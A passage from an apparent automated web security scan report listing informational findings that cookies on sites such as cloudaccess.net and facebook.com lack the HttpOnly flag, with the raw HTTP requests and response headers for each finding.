Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 13:52:53 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; expires=Tue, 24-Jan-2012 13:52:53 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 13:52:53 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 13:52:53 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 13:52:53 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 13:52:53 GMT; path=/
Last-Modified: Mon, 22 Nov 2010 16:52:12 GMT
Expires: Mon, 24 Jan 2011 14:07:53 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 27139

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<b
...[SNIP]...

14.715. http://www.cloudaccess.net/terms-of-service.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cloudaccess.net
Path:	/terms-of-service.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:47 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /terms-of-service.html HTTP/1.1
Host: www.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; __utmz=173001969.1295877160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; 5a3e568434cf5e68c5f222754be27ef3=tbtnb9eq9lvbh56i28r6tshfq3; __utma=173001969.1244189596.1295877160.1295877160.1295877160.1; __utmc=173001969; __utmb=173001969.1.10.1295877160; gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 13:52:47 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:47 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
Last-Modified: Fri, 02 Jul 2010 09:07:32 GMT
Expires: Mon, 24 Jan 2011 14:07:48 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 49965

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<b
...[SNIP]...

14.716. http://www.cloudaccess.net/trial.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cloudaccess.net
Path:	/trial.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:46 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /trial.html HTTP/1.1
Host: www.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; __utmz=173001969.1295877160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; 5a3e568434cf5e68c5f222754be27ef3=tbtnb9eq9lvbh56i28r6tshfq3; __utma=173001969.1244189596.1295877160.1295877160.1295877160.1; __utmc=173001969; __utmb=173001969.1.10.1295877160; gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 13:52:46 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:46 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
Last-Modified: Tue, 03 Aug 2010 04:44:41 GMT
Expires: Mon, 24 Jan 2011 14:07:47 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 43994

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<b
...[SNIP]...

14.717. https://www.cloudaccess.net/copyright-policy.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.cloudaccess.net
Path:	/copyright-policy.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 16:04:43 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 16:04:44 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=d532b140cef5c1b2783902e3; expires=Tue, 24-Jan-2012 16:04:44 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 16:04:44 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 16:04:44 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 16:04:44 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 16:04:44 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.718. https://www.cloudaccess.net/network-report.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.cloudaccess.net
Path:	/network-report.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 16:04:43 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 16:04:44 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=d532b140cef5c1b2783902e3; expires=Tue, 24-Jan-2012 16:04:44 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 16:04:44 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 16:04:44 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 16:04:44 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 16:04:44 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.719. https://www.cloudaccess.net/network-sla.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.cloudaccess.net
Path:	/network-sla.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 16:04:45 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 16:04:46 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=d532b140cef5c1b2783902e3; expires=Tue, 24-Jan-2012 16:04:46 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 16:04:46 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 16:04:46 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 16:04:46 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 16:04:46 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.720. https://www.cloudaccess.net/privacy-policy.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.cloudaccess.net
Path:	/privacy-policy.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 16:04:40 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 16:04:41 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=d532b140cef5c1b2783902e3; expires=Tue, 24-Jan-2012 16:04:41 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 16:04:41 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 16:04:41 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 16:04:41 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 16:04:41 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.721. https://www.cloudaccess.net/support-sla.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.cloudaccess.net
Path:	/support-sla.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 16:04:46 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 16:04:47 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=d532b140cef5c1b2783902e3; expires=Tue, 24-Jan-2012 16:04:47 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 16:04:47 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 16:04:47 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 16:04:47 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 16:04:47 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.722. https://www.cloudaccess.net/terms-of-service.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.cloudaccess.net
Path:	/terms-of-service.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 16:04:40 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 16:04:41 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=d532b140cef5c1b2783902e3; expires=Tue, 24-Jan-2012 16:04:41 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 16:04:41 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 16:04:41 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 16:04:41 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 16:04:41 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:04:41 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 16:04:40 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 16:04:41 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=d532b140cef5c1b2783902e3; expires=Tue, 24-Jan-2012 16:04:41 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 16:04:41 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 16:04:41 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 16:04:41 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 16:04:41 GMT; path=/
Last-Modified: Fri, 02 Jul 2010 09:07:32 GMT
Expires: Mon, 24 Jan 2011 16:19:41 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 49990

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<b
...[SNIP]...

14.723. http://www.cycletrader.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cycletrader.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

location=%5B%7B%22ZIP_CODE%22%3A%2275207%22%2C%22STATE_NAME%22%3A%22Texas%22%2C%22CITY_NAME%22%3A%22Dallas%22%7D%5D; expires=Tue, 24-Jan-2012 23:58:44 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.cycletrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.724. http://www.dedipower.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dedipower.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

symfony=6hvnhit5lq2d9qcjo8guti4nu0; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.dedipower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.725. http://www.digitalia.be/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.digitalia.be
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

60gp=R477195302; path=/; expires=Thu, 27-Jan-2011 04:19:38 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.digitalia.be
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.726. http://www.dynamicdrive.com/forums/showthread.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dynamicdrive.com
Path:	/forums/showthread.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

bblastvisit=1295913555; expires=Tue, 24-Jan-2012 23:59:15 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /forums/showthread.php HTTP/1.1
Host: www.dynamicdrive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.727. http://www.elmundo.es/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.elmundo.es
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ELMUNDO_idusr=TT5aC8CoFBUAAB8okbI-c2f1049e2d4516c17b18641aef04f3d5; expires=Fri, 24 Jan 2014 05:05:15 GMT; path=/; domain=.elmundo.es

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.elmundo.es
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.728. http://www.employmentguide.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.employmentguide.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

L=Dallas%2C+TX; path=/;
SITEMODE=desktop; expires=Sun, 27-Sep-2037 00:00:00 GMT; path=/; domain=.employmentguide.com;
BIGipServeremploymentguide_pool=889387786.20480.0000; expires=Tue, 25-Jan-2011 01:59:20 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.employmentguide.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.729. http://www.eraser.ee/uudised/joomla/329-joomla-16-on-saabunud.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.eraser.ee
Path:	/uudised/joomla/329-joomla-16-on-saabunud.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

f2fa25d95fd31dc38873e1bc08d1d659=da81efe2eb9fa0e02e77a8fa6697e953; path=/
gantry-31205e6f7fffc90515cc576783f2f86e-presets=deleted; expires=Sun, 24-Jan-2010 16:04:55 GMT; path=/
gantry-31205e6f7fffc90515cc576783f2f86e-backgroundlevel=deleted; expires=Sun, 24-Jan-2010 16:04:55 GMT; path=/
gantry-31205e6f7fffc90515cc576783f2f86e-bodylevel=deleted; expires=Sun, 24-Jan-2010 16:04:55 GMT; path=/
gantry-31205e6f7fffc90515cc576783f2f86e-cssstyle=deleted; expires=Sun, 24-Jan-2010 16:04:55 GMT; path=/
gantry-31205e6f7fffc90515cc576783f2f86e-linkcolor=deleted; expires=Sun, 24-Jan-2010 16:04:55 GMT; path=/
gantry-31205e6f7fffc90515cc576783f2f86e-font-family=deleted; expires=Sun, 24-Jan-2010 16:04:55 GMT; path=/
gantry-31205e6f7fffc90515cc576783f2f86e-font-size-is=deleted; expires=Sun, 24-Jan-2010 16:04:55 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /uudised/joomla/329-joomla-16-on-saabunud.html HTTP/1.1
Host: www.eraser.ee
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.730. http://www.facebook.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

lsd=fYoRD; path=/; domain=.facebook.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.731. http://www.facebook.com/%s previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/%s

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

lsd=NgpY2; path=/; domain=.facebook.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.732. http://www.facebook.com/2008/fbml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/2008/fbml

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

lsd=wYDCq; path=/; domain=.facebook.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2008/fbml HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dla2day.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fwww.la2day.com%252F%26extra_2%3DUS;

Response

14.733. http://www.facebook.com/7NEWS previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/7NEWS

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

lsd=aYRu9; path=/; domain=.facebook.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.734. http://www.facebook.com/LIMEprpromo previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/LIMEprpromo

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

lsd=Tpmq1; path=/; domain=.facebook.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.735. http://www.facebook.com/abid.bahloul previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/abid.bahloul

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

lsd=6G7wO; path=/; domain=.facebook.com
reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fabid.bahloul; path=/; domain=.facebook.com
reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fabid.bahloul; path=/; domain=.facebook.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.736. http://www.facebook.com/apps/application.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/apps/application.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

lsd=AGZLa; path=/; domain=.facebook.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.737. http://www.facebook.com/beirutcityguide previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/beirutcityguide

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

lsd=oJmQq; path=/; domain=.facebook.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.738. http://www.facebook.com/home.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/home.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

lsd=isGBp; path=/; domain=.facebook.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.739. http://www.facebook.com/miofeghali previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/miofeghali

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

lsd=eDdkX; path=/; domain=.facebook.com
reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fmiofeghali; path=/; domain=.facebook.com
reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fmiofeghali; path=/; domain=.facebook.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /miofeghali HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x80; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dwww1.whdh.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww1.whdh.com%252Fnews%252Farticles%252Flocal%252F12003359267921%252Fcommuter-rail-service-updates-for-jan-24%252F%26extra_2%3DUS;

Response

14.740. http://www.facebook.com/pages/Traverse-City-MI/CloudAccessnet/116931806748 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
